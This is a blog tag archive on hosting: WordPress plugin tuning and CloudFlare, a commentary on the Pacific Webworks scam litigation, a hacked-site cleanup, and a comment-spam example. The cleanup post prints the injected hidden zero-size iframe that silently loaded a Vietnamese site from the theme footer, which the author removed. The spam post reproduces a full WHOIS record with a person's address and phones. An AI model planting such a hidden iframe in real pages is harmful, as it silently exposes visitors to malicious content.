Tag Archive: Hosting

Akismet and Jetpack Issues, Stop Spammers and CloudFlare Save the Day

My Web Host Penalised Me Yet Helped Speed Up My Site

Introduction

shared web hosting

shared web hosting

This site used to be hosted on Site5, in Texas.  I had a shared web host account, about the cheapest there is on Site5 though by no means the cheapest around (I’ve had experience of really cheap hosts….).  It worked alright, site management was good.  Then, I got hit by spammers.  Twice.  Big time.

Each time, this slowed the site down, made life hell for other shared accounts, especially when I introduced WordPress plugins to counter this.

Naturally, Site5 advised me to stop the hits or they’d pull my account (they’d already temporarily disabled it).  They advised me to cut the plugins, using GoDaddy’s plugin testing tool, WordPress Plugin Performance Profiler (P3).  So I did this, and after some trial and error, got the running processes down.  Of course, I lost a bit of neat functionality.

Testing Times

Apart from internal WordPress testing, it pays to test your site as if you are someone else somewhere else.  Pingdom have a set of tools that does just this, testing from various global locations and I can recommend it.

Result!

I used an iterative approach, testing various combinations of plugins and systems to end up as being in the top 8% sites for speed in the world!  Not bad for free is all I can say!   You’ll see in the screenshot above, that 92% of websites are slower than mine….   So is it really free?  Here goes…..

Paid For:
  • Web Hosting.  Shared.
  • My domain registration.
Free:
  • WordPress and all the LAMP functionality
  • WordPress plugins
  • CloudFlare
Pingdom Says

Pingdom Says

Automattic Issues

WordPress (which this site uses) is built by the Automattic team and naturally have expanded over time.  I’ve used their plugins for many years, Akismet from the off, which is a comment spam blocking system.  Latterly, they came out with Jetpack, where they say,

Supercharge your WordPress site with powerful features previously only available to WordPress.com users.

Jetpack is a WordPress plugin that supercharges your self-hosted WordPress site with the awesome cloud power of WordPress.com.

P3 Selected Output

P3 Selected Output

This is all well and good, except when I tested it using the P3 plugin profiler, Jetpack was the biggest drag on everything!   The worst part of it, was that actually, I was only using a small part of its features and it was still the biggest suck on performance.

  • I didn’t use Carousel for photos since I had an old solution, NextGen Gallery, that I’m loathe to change.
  • The comments system mucked up all other comment plugins, grabbing all for itself (a bit like Microsoft here!)
  • I used the stats, and that was about all, yet they were very slow and not that informative, actually.
  • Nearly all the other stuff I looked at, tried and ditched for similar reasons.

So much for the awesome cloud power.  On top of this, you’re now supposed to pay for parts of Automattic’s offerings, like Akismet, the comment spam blocker while a major offering of theirs was actually slowing my site right up!

What Did I do?

Change host!

Well not initially, actually, though the heavy-handed Site5 approach got my ire a bit I must admit.  I did do loads of tests with a host of caching, anti-spam and page load improvement plugins first…

Vidahost

Vidahost

I now use Vidahost in the UK.  The site is faster to manage (along with my others) since the servers are in the UK with me, and it’s cheaper, providing almost the same functionality and tools as Site 5.  I took the opportunity to clean out a few dead files in the process, but essentially, all was moved, database and files.  The lot.  Just twiddled config.php and the .htaccess file a bit.

did worry that my American visitors, who are actually in the majority, would  suffer slower speed and thus I’d get hit in Google rankings, but hey, wait for later…!

I got it all working and as part of the whole “thinking” process since the very first warnings from Site 5, I’d been looking for better things.

Looking at Things Closely

  • I like Related Posts.   Related Posts plugins do just that.  I love the idea of pulling out meta-data relevant stuff from a website.  Site 5 had said, as have others on the web, that this sort of plugin makes big hits on a site.  Some of them really do!  I use  YARPP, with a limited subset of features enabled which cuts down processing.
  • I also like Andrew Ozz’s Shutter Reloaded which shows images nicely.   I also like his post editor, TinyMCE Advanced, it being the best of many I’ve tested over the years.
  • I like NextGEN Gallery having used it since before WordPress got all image fancy.  I haven’t got time to fiddle with thousands of photos now…
  • I’d like some statistics within WordPress.
  • I’m not that interested, any-more (though I was) in Social Networking sharing features.  Truth be told, if someone wants to share, they will.
  • I’ve read a lot on image improvements.  I’ve always shrunk images manually before uploading using the excellent IrfanView application.  But during this enforced research, other things like sprites and delayed image loading popped into the equation.

So I like certain plugins or functionality.  I try and use the one that works best for me.  Too many plugins make a big hit on the server and thus website loading.

Caching

A way round this is caching.  e.g. If a post is created and has related posts clagged on the bottom using YARPP, then the post is cached and YARRP is only running once.  How and where the caching is done is the crux of the issue…

Site 5 suggested W3 Total Cache as a better alternative to Wp Super Cache,  which I’ve used for years.    Naturally, I’ve tested this and my conclusion was that it could be fast, and it was fast for a while, but over time on each of my sites I got issues around lock-ups and the huge and complex caching system around files, databases and sprites.  This list is long.

I’ve also tested various database query caching plugins likewise over the years.  W3 Total Cache incorporates this method too, but ultimately, it made too much work for not a lot of difference IMHO, since I’m lazy.

However, it did point me to one thing!  CloudFlare.

CloudFlare

CloudFlare Admin1

CloudFlare Admin1

Ah.  The power of the cloud is back!

Not only that – it works!

CloudFlare Admin2

CloudFlare Admin2

You re-direct your DNS at your domain registrar (joker.com in my case) to CloudFlare’s DNS servers, set up the site malware protection level you want – then after a few hours your whole site is cached and protected.  Best of all, it’s free for a little site like this!

In fact, using CloudFlare speeded everything up even before I got caching going again…

Further Plugin Work

Now, I went back to Wp Super Cache from Doncha and it all works fine.  Site speed good.  I then ditched Jetpack after testing it again.  It really does interfere with all comment plugins, and I really like this comment one as do people who comment here:

  • U Extended Comment

It works great and does everything I want.  So Jetpack, it’s bye bye.  Take all your fancy commenting system, your stats, your social media and fancy image handling.

But What About Comment Spam?

Stop Spammer Results2

Stop Spammer Results2

Stop Spammer Results1

Stop Spammer Results1

I’ve found the best solution is a plugin called Stop Spammer Registrations Plugin.  It needed a bit of fine tuning and a re-activation of Akismet to whip out a few wisps of spammer, but it works and seems to trap and report more spammers than ever Akismet did alone.  Akismet, by itself, does the commenting bit in tandem with the plugin, rather well.

Registration Spam

SABRE Results

SABRE Results

Unfortunately, during testing, a few unwanted visitors managed to register on the website.  They can’t do real harm since I use the lowest role level at registration time.  So I re-enabled SABRE and since then, no more unwanted visitors.  I’ve tested SABRE as a visitor and the settings I’ve chosen are just about right – I’ve had issues with it previously when it blocked registration!  But reducing the feature set and re-uploading a clean plugin fixes that.

CloudFlare and the CDN Issue

I toyed around getting a CDN to host images.  But they (can) cost and anyway, I’ve gone off Amazon and others because of their anti-Wikileaks actions plus they don’t pay UK tax…

Delayed Image Loading

However, in the course of my reading, I found that images can be loaded just as the page comes into view, which speeds up page loading, and as a consequence the perceived nippiness of a site.  The plugin BJ Lazy Load does this for me and works brilliantly.  Check this last post about Australia which has a lot of medium sized images to see them pop into view!

Delayed Javascript Loading

I use two plugins that handle this end of the issue around JavaScript.

Statistics

WP SlimStat1

WP SlimStat1

Well, Jetpack is gone.  I won’t be using it unless some serious improvements are made, it being the prime reason for the server load that brought me to this position in  the first place.  As soon as I disabled it (and simultaneously blocked all comments to the site, which isn’t the best thing, this being a blog after all), all server loads went away.

I now use SlimStat and it works very well.  I’ve tried many over time, including Google’s analysis tools, my webhost’s stats tools, Wassup and more, but for now, this is it.

Conclusion

My site works pretty fast and is pretty protected from the bad guys.  I actually still use more plugins than what is usually recommended – 50 is a huge lot according to web gurus and sages.  Currently there are 31 in active operation with 8 inactivated.  I love trying new ones, it’s like that, that’s just the way it is.

The delayed image loading is particularly apparent on a post with a lot of images, say this recent one.  The post loads fast and you see the first images load, and as you scroll down you’ll see other images appear with a slight delay.

All the other stuff is incremental improvement, with the biggest, by far, being the free CloudFlare service which I cannot recommend highly enough.  It’s a no-brainer, go and do it?

My Full List?

These are the plugins currently running that help my site work.  Many are for security, which demonstrates the state of play versus the bad internet guys full well.

Related Posts:

Fabian Tactics of Google Work At Home Scam Legal Team

Pacific Webworks / Quad Try and Dodge the Issue

Oh What a Tangled Web We Weave...

Oh What a Tangled Web We Weave...

Back in 2009 I stumbled upon a negative option scam for which those involved were sued by Google (and folded with an out-of-court settlement) and were prosecuted by Uncle Sam, losing again.  Initially, I was completely unaware of the depths of deception to which these people would stoop, but then I rapidly discovered the nightmare web that they’d constructed and how difficult it was for ordinary people, duped by slick honest-looking promises, to un-pick themselves from it.

Not only that, I quickly realised that PWW weren’t the only spawn of the devil and that others, like Jesse Willms, were up to very similar tricks.  See:

Methods

The above list of links more-or-less shows how we found out the Pacific Webworks (PWW) story.  They’re by no means the only set of devils in the world trying to scam people, but they’re the one’s I stumbled upon first.  That’s all.

Their business was to set up website templates that their “customers” could use to extract money from their customers by use of the negative option scam.  In effect, they were selling the tools to steal to people, who then had the option of calling it a day or selling the tools to steal on themselves, thus stealing.

To promote it they used mass advertising through paid ads on Google (using the Google and others’ trademarks to make it appear that these offers were endorsed by those referenced), through Quad, which they owned, and fake news or personal information websites (flogs) loaded with follow up ads.  The promotions could be their own, but for the most part it was all done by “affiliates” (their customers) that all took varying degrees of commission for follow-through clicks.

The advertising was managed by Bloosky Interactive that also operated through 3rd parties unsolicited email adverts, spam to you and me.

Underlying it all was the credit card processing business which they also owned (Intellipay) usually through the securecart domain.

All parties involved, except the final folk who didn’t really understand how bent this whole operation was, fully understood the nature of this business.  How could they not? – when they were selling “services” for $1.95 for which they’d get $30 commission!!!

Turn of the Screw

In another twist of deviousness, PWW (run by Bell, Bell, Larsen & Larsen at the time) set up The Quad Group (geddit?) to avoid creditors.  This is how they themselves described it:

In June 2009 we experienced limited merchant account processing capabilities which created a situation where we could not satisfy payables to marketing partners. To generate needed cash in the 2009 second quarter we sold a portion of our hosting portfolio that was in excess of merchant account limitations to The Quad Group, LLC, a related party (the “Quad Group”) for $157,786. Quad Group is owned and managed by current directors, officers and an employee of Pacific WebWorks. We may periodically be required to enter into sale transactions with Quad Group to properly manage our merchant account processing requirements.

Neat huh?

Cuts and Thrusts

So that’s about it, as I currently understand it.  PWW’s managers/owners had customers on two levels, that is;

  1. The direct affiliates and associated advertisers who were enticed into the operation or migrated from other similar schemes via the lure of easy money.  These people used the templates to lure others with promises of easy money, paid as commission for attracting others to run the same schemes.  The schemes didn’t sell anything – except the scheme!  A true pyramid scam!
  2. Duped suckers.  These, numerically the vast majority, soon realised after one or two mysterious withdrawals from their account of amounts around the $79 mark, that it was a scam.

The thrust of the plan was the hope that most people wouldn’t do anything, wouldn’t investigate much and wouldn’t associate with other suckers through embarrassment or whatever, just writing off the episode as one of life’s bad judgements.  Thus PWW would make say, $200 from which all the ads and affiliates would get their cut.

Just Desserts

Statue of Justice

Statue of Justice

Unfortunately for PWW, it didn’t work out quite like that.  Sure they made pots of money for a few years, but they upset too many people and eventually, through the power of communication via the very internet which was their arena,  news of what they were doing became so much that first Google, then Uncle Sam had to act.

Black September

But still the shit kept coming their way.  Just as I’d predicted in my postings (see list above), karma would get them.  On 19 September 2011 this year a class action was brought against the three main bodies behind the scam – Booth Ford v PWW et al – Barbara Ford is to be commended for her patience.  It was 2009 when she first filed for a class action!

In it, we see just how badly PWW have been acting for years.  Section 11, for me, sums it up perfectly!

Booth Ford v PWW et al Section 11

Booth Ford v PWW et al Section 11

So there we have it!  Now where’s the problem?

Rip-off Too Big!!

On 1 December 2011, Quad (who are actually essentially the same people as PWW with an almost similar board make-up – in fact the Google settlement made it plain that wives of the directors had been roped in as well), filed to be removed from the Class Action because they might have ripped off too much from people!  eh??  See QUAD_GROUP_NOTICE_OF_REMOVAL

The essence of their legal Fabian tactic (as I see it) is that:

  1. They scammed people from all over, not just Illinois, so it’s not a valid class action.
  2. They scammed people so much (by over $5m they say), that it’s the wrong court in which they should be tried, so ditch your claim against us!
  3. They scammed people by so much that the class action lawyer’s fees alone will be $9m so same reasoning as point 2!
Quad Group Sums

Quad Group Sums

Their sums in the above court removal document are in this screenshot.  There are others as well.  Of course, Quad (PWW with a different hat on remember) aren’t admitting any liability at all with this, so my use of the words scamming bastards reflects my personal opinions, not a statement of fact.  These opinions are based on the facts that:

  1. Pacific Webworks acquiesced to all of Google’s demands when sued for illegal trademark usage.
  2. Eborn and others lost their case when sued by the Texas AG when using PWW’s templates*, finance processing and networks to scam folks for millions of dollars.
  3. PWW lost their case when sued by Uncle Sam.
  4. PWW admitted filing untrue SEC accounts and changed accountants twice because of this.
  5. One of the accountants was directly related to a PWW director.

It’s noteworthy that the sum of $43m is derived from one “illegal” charge of ~$80 plus one subsequent charge of ~$25 multiplied across the claimed customer count of ~455,000 persons – because I have evidence from people who’ve contacted this site and others that some people had up to half a dozen illegal account withdrawals before they could put on a stop, which implies that the allegedly scammed amount could be much, much higher.

It’s also noteworthy that Quad’s own suppositional sums show high value amounts from this “business” yet for all this time, no dividends were paid and the only way investors in the company could make money was through share price changes.  If you tie this information to the incorrect accounting and familial accountant/director relationships, plus the fact that PWW is largely the same people as Quad, then collusion looks highly likely over this time period and the SEC will quite possibly be knocking following the conclusion to this class action.

With regard to the SEC, the same SEC filing that revealed Quad’s dubious formation also reveals that;

Our client base includes approximately 30,000 active customer accounts. We rely on the efforts of our internal marketing staff and on third party resellers, including our wholly-owned reseller, TradeWorks Marketing, to add accounts to our customer base. – see SEC Link

Well they can’t both be right, can they, Quad?  Is it 455,892 customers in your sums or is it 30,000 in the SEC filing?

Linkages

Copious links are included in the articles referenced by the site references at the beginning of this article so I haven’t had time to re-reference all the above statements.  But they’re there should you wish to look.

I certainly hope that the Fabian tactics don’t work and that people see them for what they are.

Notes & Addendum

*     Eborn et al used website designs very similar to those provided by PWW.   Whether they were exactly the same is a moot point in my view, because like a burglar who learns to house-break from another burglar, the crow-bar used will not be exactly the same crow bar, but it’s the idea of using a crowbar that’s important to the final act of theft.  In other words templates, like crowbars, are just tools.  Eborn’s websites were almost carbon-copies of those from PWW using all the Visual “tools”, the money processing and the affiliate networks that they “employed”.   Many sites (I had a huge list of them and copied images directly from the site before they locked it down) were partly or wholly hosted on pantherssl.com  via Bloosky.  These co-incidences didn’t happen by chance and show intelligent design behind their purpose.  (Thanks Paul!)

Related Posts:

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com  (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230……  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above..

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, mySQL databaase and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine…..  but to be sure, I have downloaded then checked the footer file in a fresh theme download to be sure – it’s clean!  I then uploaded a whole clean Suffusion theme in it’s entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.

A recheck on Securi shows my website to be okay now.  See screendump below.   I’ll be using Securi  a lot more!

Securi Site Check

Securi Site Check

Related Posts:

Comments are closed

Site Outage

Strangely post on September 7th, 2011
Posted in Internet Tags: , , , , , , , , , , , , ,

My host, Site5.com, has kindly told me that this site (and others of mine) will be off-line from tonight for 3 hours from 07 Sep 2011 23:00 GMT/UTC until 08 Sep 2011 02:00 GMT/UTC.  (I’ve had to convert this from the email which is CDT specific…)

This is due to an upgrade of the MySQL databases to something called Percona, which is a new one on me! Checking it out, it is a custom install of MySQL, with extra management software clagged on.

Related External Links

Related Posts:

Comments are closed

How WordPress Spam Works

WordPress Comment Spam

The plague of all blogs is spam, mainly comment spam, by sheer numerical superiority.

Q.  Why Do They Do It?

A. As a minimum, they do it to open a back-door into your blog that allows the perpetrator to place reverse linkages to another website to increase that website’s visibility in search engine results (so called “Search Engine Optimisation” – SEO ).  This back-linkage they use to increase website search hits, which they can charge an ignorant website beginner big money for.

At the worst, the culprit would gain full access to the blog allowing free posting and deletions or even the complete removal of your website content.

Today’s Example

Today, I got a comment that made me check further as notionally, it looked okay-ish. These are the details (click image for full-size view of the comment as it appears in the WordPress admin section):

Comment Spam Example

Comment Spam Example

The Jacksonville lawyer is in Florida and has this website; http://www.divorceyes.com/index.html, and the actual comment is pretty kosher, although brief, saying;

Strangely you have made an awesome post and i appreciate your work and keep it up. Thanks for sharing this with us.

This is all very nice, but check out the IP address….

WHOIS 113.203.135.140

By checking the WHOIS for this, we see that the IP Address for this supposedly reputable Florida lawyer (Divorce Yes) is in Karachi, Pakistan!  Well are they?  My guess, given the cheap web costs in the USA, is that Divorce Yes is in the US and that they wouldn’t for an instant even consider anywhere else!

And so it is!  The actual WHOIS for Divorce Yes is in Florida!  (The actual WHOIS for the web-hosting, fortehosting.com is in Illinois).  The registrant’s name (Miller) also agrees with the Divorce Yes’s contact details here, but note; the email address in the comment, [email protected], is not the same as the email address on the contact page, which is [email protected]

Registrant:

jeff miller

1019 grand court

highland beach, Florida 33487

United States

Registered through: GoDaddy.com, Inc. https://uk.godaddy.com/)

Domain Name: DIVORCEYES.COM

Created on: 07-Jun-05

Expires on: 07-Jun-16

Last Updated on: 17-Feb-07

Administrative Contact:

miller, jeff [email protected]

1019 grand court

highland beach, Florida 33487

United States

(561) 445-6962 Fax — (561) 347-7588

Technical Contact:

miller, jeff [email protected]

1019 grand court

highland beach, Florida 33487

United States

(561) 445-6962 Fax — (561) 347-7588

Domain servers in listed order:

NS1.FORTEHOSTING.COM

NS2.FORTEHOSTING.COM

Conclusion

There isn’t a conclusion really.  This is just an example of the way that text harvesting is being used to make seemingly intelligent comments slip past the comment filters on a WordPress blog.

As many of these filters rely on an IP address, if the webmaster lets a dodgy IP address through just once then it’ll be marked as “good” by the filters which will then allow the spammer to post even more comments, all for the various nefarious reasons that I mentioned first.

This is why I use a plugin like WP-SpamFree, and using it I can block all incoming pings from a given IP address, in this case, 113.203.135.140!

For interest, I’ve edited out the back-link from the spam comment above and you can find it on this post, Pacific Webworks, Lawyers and Social Networking, here.

Alternative Conclusion

This isn’t a conclusion again, but my examination of alternative possibilities, but note the following:

  • The Divorce Yes website is made and SEO’d by http://enettechnologies.com/.
  • WordPress is used on the website.
  • Many WordPress plugins exist to “improve” the SEO of a website.  (I use some!)
    • Some do it by ensuring meta and other data is added if it’s missing.
    • Others have sprung up over the last few years that “intelligently” link to other websites….  they harvest websites for text and linkages for later use, much like email spammers scan websites for email addresses to spam.  [n.b.  I use PHPEnkoder from Michael Greenberg to hide email addresses on this site from email address harvesters.]

It could be, although I cannot prove or disprove it, but because some of this spam I receive is now pretty readable as with this one above, that plugins are being used for much of the hits I get.  This comment  could be such an example, or the law website name is being used textually as a smokescreen for the Pakistani spammer.  I see lots of adverts along these lines that couldn’t possibly rely on manual  human link placements for their effectiveness….

I’d be interested to hear from Miller Law or their website designer on this one.  It’s not the first time that I’ve had reputable businesses appear on my website like this and I’d like to know what it appears like at their end, if at all.  It does make me wonder if this very website is being used to cloak spam at other websites in the same manner.

This is why I’ve left all URL back-links to the parties in place so that they’ll see them in their logs.

Related Posts:

Comments are closed

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me